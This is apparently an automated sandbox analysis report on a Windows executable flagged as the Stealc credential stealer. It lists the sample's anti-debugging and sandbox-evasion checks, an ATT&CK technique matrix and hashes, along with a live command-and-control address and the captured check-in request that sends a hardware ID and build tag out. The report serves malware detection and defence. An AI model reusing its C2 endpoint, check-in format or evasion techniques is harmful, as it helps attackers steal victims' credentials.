                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C64570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00C64570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00C5ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C516D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C516D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C63EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00C63EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C5F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00C5BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C5DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00C5DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C51160 GetSystemInfo,ExitProcess,0_2_00C51160
                Source: file.exe, file.exe, 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1798536060.0000000000853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWVq
                Source: file.exe, 00000000.00000002.1798536060.0000000000825000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1798536060.0000000000853000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarePJ
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13549
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13552
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13571
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13603
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13563
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C545C0 VirtualProtect ?,00000004,00000100,000000000_2_00C545C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C69860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00C69860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C69750 mov eax, dword ptr fs:[00000030h]0_2_00C69750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C678E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00C678E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C69600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00C69600
                Source: file.exe, file.exe, 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: KRWProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00C67B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C67980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00C67980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C67850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00C67850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C67A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00C67A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c50000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1758098125.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.c50000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1758098125.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6780, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37/e2b1563c6670f193.php;file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpkfile.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37file.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmptrue
                    • URL Reputation: malware
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpx9file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpYfile.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmptrue
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.php65d60108622213file.exe, 00000000.00000002.1798536060.0000000000837000.00000004.00000020.00020000.00000000.sdmptrue
                          		unknown
                          http://185.215.113.37Sfile.exe, 00000000.00000002.1798536060.00000000007DE000.00000004.00000020.00020000.00000000.sdmptrue
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            185.215.113.37
                            		unknownPortugal
                            		206894WHOLESALECONNECTIONSNLtrue

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1528404
                            Start date and time:2024-10-07 22:07:08 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 10s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:1
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 85
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated

                            Warnings

                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                            • 185.215.113.37/e2b1563c6670f193.php
                            c3KH2gLNrM.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.37/e2b1563c6670f193.php

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealc, VidarBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            file.exeGet hashmaliciousStealcBrowse
                            • 185.215.113.37
                            xwZfYpo16i.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                            • 185.215.113.103
                            c3KH2gLNrM.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                            • 185.215.113.103

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.949692276929249
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'909'760 bytes
                            MD5:ff372169f2c0278490593f4abbfcceac
                            SHA1:82f8e81327c943fe7e1ca4b2cf16116052f419f8
                            SHA256:25020e52a52db73e1c53c36bca3aa4dd40c57f609637745546e6e56076a4e439
                            SHA512:16b5c23f562357948b4c24dce754a9aef62e95dfde050fae3bd64a4f1209b5fe2959a43df6e1a58ed17d812eaa224dd61b4b4358f40c57b04e4ace412a7b1a1c
                            SSDEEP:24576:Uv0jJzuw043T5Mu9FLgHJMUJJCBxI+aVFntmqDteTfHwSrVT15yTwJXbMs5LwqOT:Uvkv4ucptmwVhmVT/wSrVTKCws67xbT
                            TLSH:38953376EC920159F404A27DCB7A6A32379490E44AEF9E0BB78E513C4477F1D2DD2A4C
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                            File Icon

                            Icon Hash:90cececece8e8eb0

                            Static PE Info

                            General

                            Entrypoint:0xac6000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                            Entrypoint Preview

                            Instruction
                            jmp 00007FB0D501434Ah
                            lar ebx, word ptr [00000000h]
                            add cl, ch
                            add byte ptr [eax], ah
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ebx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [edx], ecx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            pop ds
                            add byte ptr [eax+000000FEh], ah
                            add byte ptr [edx], ah
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [edx], ecx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [edx], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [edx], ecx
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            inc eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al

                            Rich Headers

                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319

                            Data Directories

                            NameVirtual AddressVirtual Size Is in Section
                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                            Sections

                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                            0x10000x25b0000x2280038b5bef26b3283632fbe463e910ab0a0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            0x25e0000x2bb0000x200d48a75597b5a8f150e288efdd4d3b574unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            npcvtcpc0x5190000x1ac0000x1ac0003869010ca5a94d9d61c8ce87f01b2329False0.9952324127482477data7.9550669046081595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            stnuknqq0x6c50000x10000x600766e46542c14c5513db7a3970e5b67b4False0.61328125data5.212113955480753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant0x6c60000x30000x2200e88f016bced83aeb36d8ffd0f076f563False0.08122702205882353DOS executable (COM)1.0816670451500379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                            Imports

                            DLLImport
                            kernel32.dlllstrcpy

                            Network Behavior

                            Suricata IDS Alerts

                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                            2024-10-07T22:08:10.098436+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.449730185.215.113.3780TCP

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Oct 7, 2024 22:08:09.174540043 CEST4973080192.168.2.4185.215.113.37
                            Oct 7, 2024 22:08:09.179922104 CEST8049730185.215.113.37192.168.2.4
                            Oct 7, 2024 22:08:09.180061102 CEST4973080192.168.2.4185.215.113.37
                            Oct 7, 2024 22:08:09.180283070 CEST4973080192.168.2.4185.215.113.37
                            Oct 7, 2024 22:08:09.185163021 CEST8049730185.215.113.37192.168.2.4
                            Oct 7, 2024 22:08:09.867567062 CEST8049730185.215.113.37192.168.2.4
                            Oct 7, 2024 22:08:09.867774010 CEST4973080192.168.2.4185.215.113.37
                            Oct 7, 2024 22:08:09.870208025 CEST4973080192.168.2.4185.215.113.37
                            Oct 7, 2024 22:08:09.875170946 CEST8049730185.215.113.37192.168.2.4
                            Oct 7, 2024 22:08:10.098339081 CEST8049730185.215.113.37192.168.2.4
                            Oct 7, 2024 22:08:10.098436117 CEST4973080192.168.2.4185.215.113.37
                            Oct 7, 2024 22:08:13.671411037 CEST4973080192.168.2.4185.215.113.37

                            HTTP Request Dependency Graph

                            • 185.215.113.37

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.449730185.215.113.37806780C:\Users\user\Desktop\file.exe
                            TimestampBytes transferredDirectionData
                            Oct 7, 2024 22:08:09.180283070 CEST89OUTGET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 7, 2024 22:08:09.867567062 CEST203INHTTP/1.1 200 OK
                            Date: Mon, 07 Oct 2024 20:08:09 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 7, 2024 22:08:09.870208025 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----BKFCBFCBFBKEBFIDBKEC
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 45 42 41 36 36 38 39 32 44 39 32 34 31 37 39 35 33 37 33 33 38 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 42 46 43 42 46 42 4b 45 42 46 49 44 42 4b 45 43 2d 2d 0d 0a
                            Data Ascii: ------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="hwid"4EBA66892D924179537338------BKFCBFCBFBKEBFIDBKECContent-Disposition: form-data; name="build"doma------BKFCBFCBFBKEBFIDBKEC--
                            Oct 7, 2024 22:08:10.098339081 CEST210INHTTP/1.1 200 OK
                            Date: Mon, 07 Oct 2024 20:08:09 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=


